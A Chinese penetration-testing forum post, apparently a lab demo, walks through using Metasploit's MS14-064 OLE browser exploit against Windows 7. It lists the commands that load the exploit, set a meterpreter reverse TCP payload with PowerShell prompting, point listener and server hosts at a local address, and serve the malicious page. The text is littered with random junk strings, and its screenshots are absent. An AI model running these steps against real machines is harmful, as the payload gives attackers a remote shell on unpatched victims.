中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]

作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

& t2 s4 ?: h- |* q3 l 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示/ u2 {; ]4 p# y0 S( z. R

$ {/ x. [ B; E% o2 Q

! c9 O2 g& T& Z' m 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: . m# k5 m6 u v5 K7 c/ u' u. a

" I/ a v# e% \6 Y

7 B; K/ {5 f9 G$ e 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp , g1 z; k" Z- c" K7 w

$ ~) l( P* W/ |! w* a0 w* J. s

, T0 ~0 M+ m" n" U             set AllowPowershellPrompt true - |# L( ]. q8 Z# e% m

7 ]) p9 f0 Y0 g9 K* S T4 q- {

1 \6 m; @8 F# q2 T0 Z( R             Set LHOST 192.168.0.109 " K7 N& B/ f. t/ _% `; U

3 O+ P* R% l. E/ U; A% \

% {. P. ^, J' g: O% @& Z( D             set SRVHOST 192.168.0.109 + u; Q* A. g7 Y. J# I

" P8 m4 T8 n3 Q! D, S

. G' n" J8 C) Y9 n, S4 R             Set uripath share3 Z$ T/ x0 i9 J+ y5 y+ R9 R

1 F" a4 ~$ |& \3 c6 [

* H) N& s& D( K             Set srvport 80- ?% Q: C, f7 f# L" I

9 U; J4 K: J4 M! E

6 v0 Z5 n* I0 ?$ j  7 r' ]: x% E7 ?2 j0 s; n$ [3 ~

& E% T. J# f2 G! I' f

, ^; Y I+ e. a; o2 E* v   $ _" A5 T6 h, y+ k

( K/ y5 E' w, h5 v1 z

1 P5 G/ K ~8 ]6 ^  / h5 W' s( ~" _2 l

' U% E, X% O' }- o- I, Q7 R- m6 Z

. Z# I, C# Y$ Y! l) n$ N u+ l# D. J# K* v   : L/ y* I/ A& M

+ B% I) U3 Z1 x9 w

) P8 R7 o3 x' r. l+ t+ t2 l* S   # d6 E4 e+ R# T

: x4 ~% ^( C5 ` A. J9 g6 @

3 n+ a+ _# i9 |5 ?( P 下面我们来访问本地地址如图: 3 I0 r/ P! [* x9 Z+ n3 u7 R

7 N2 P& {0 x0 j3 ^# R' o

+ Z' H- {3 z' V. a$ C  , X' U0 k# X2 E7 w8 ~

; Z- l6 e- r* a

% h. J) E# N# K! F9 w+ v   + P* j& E; t# X2 W- R

$ [+ P( A e) b& d7 L% h/ K/ X$ V7 B

% A9 [. w {5 e3 z8 r- s# p $ y, I0 V. c" |7 M8 S. a






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2